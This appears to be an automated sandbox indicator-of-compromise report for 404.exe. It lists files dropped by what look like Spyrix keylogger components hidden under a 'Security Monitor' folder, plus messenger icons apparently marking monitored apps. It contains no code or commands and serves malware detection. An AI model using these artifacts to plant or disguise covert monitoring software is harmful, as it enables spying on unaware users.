IOC Report
404.exe

loading gif

Files

File Path
Type
Category
Malicious
404.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe (copy)
PE32 executable (console) Intel 80386 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Spyrix Free Keylogger\temp\reg\info.uid
Windows Registry little-endian text (Win2K or above)
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\404.exe.log
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Temp\38b5bf3b-2a32-4636-ac09-779581aade41\404.exe
PE32 executable (GUI) Intel 80386, for MS Windows
modified
malicious
C:\Users\user\AppData\Local\Temp\is-PDS4H.tmp\404.tmp
PE32 executable (GUI) Intel 80386, for MS Windows
dropped
malicious
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\WebBrowser.dll (copy)
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\cfg.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd (copy)
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.url (copy)
MS Windows 95 Internet shortcut text (URL=<"https://dashboard.spyrix.com">), ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Discord.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Facebook Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Line.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mail Agent.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Microsoft Teams.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Mozilla Thunderbird.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Opera Mail.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Telegram.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Tencent QQ.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Viber.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\WhatsApp.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\Zoom.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\aim.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\google talk.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\icq.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-07CCG.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0FOJS.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0JCQ3.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0P0UB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-0PSGT.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-292TP.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-2L689.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-3GJCQ.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4F7AS.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-4V4QI.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-52EK5.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-5V81M.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-69LME.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-70H11.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-7LBHV.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-840CA.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8AG25.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-8V93S.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-9BK7G.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-BEL00.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-C5HQU.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CALJE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-CD668.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-D4IS9.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-DRP3L.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-ECGMB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FKN0E.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-FOGGC.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-I0CN2.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBHDC.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-JBHVE.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KF42H.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-KN8LA.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-NBMRC.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OA3D2.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-OEOTK.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PBMDV.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PCFFO.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-PNRCE.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QF9FB.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-QV038.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-T7CCP.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-TK16E.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-U34QN.tmp
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-V1EBC.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\is-VJHFM.tmp
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\none.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\qip.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\skype.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\slack.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\trillian.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\windows live messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.ico (copy)
MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\16x16\yahoo! messenger.png (copy)
PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Discord.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Facebook Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Google Talk.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Line.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mail Agent.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Microsoft Teams.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Mozilla Thunderbird.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Opera Mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Telegram.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Tencent QQ.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Viber.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\WhatsApp.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Windows Live Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Yahoo! Messenger.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\Zoom.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\aim.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\icq.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-02UGO.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-5K063.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6KMSA.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6KN6G.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-6PTVT.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-72S64.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-7F3DD.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FDIQG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FHSLB.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-FNCKH.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-HB8QG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-JRJV5.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-L4QSG.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-LPL1L.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-LRFL4.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-MAFTE.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-NKOPS.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-OFBVL.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QNLC6.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-QTR44.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-S0RQT.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-TUD9S.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-U1Q7E.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\is-UG96C.tmp
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\mail.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\none.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\qip.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\skype.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\slack.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\data\IM\32x32\trillian.ico (copy)
MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
dropped
